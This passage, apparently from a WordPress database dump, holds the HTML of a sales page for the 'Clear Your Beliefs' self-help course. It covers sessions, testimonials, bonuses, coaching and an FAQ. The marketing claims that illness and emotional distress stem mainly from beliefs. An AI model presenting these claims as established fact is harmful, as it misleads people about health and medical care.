cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 16:09:02', '2014-06-17 21:09:02', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(921, 4194, '2014-06-17 14:17:35', '2014-06-17 19:17:35', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are 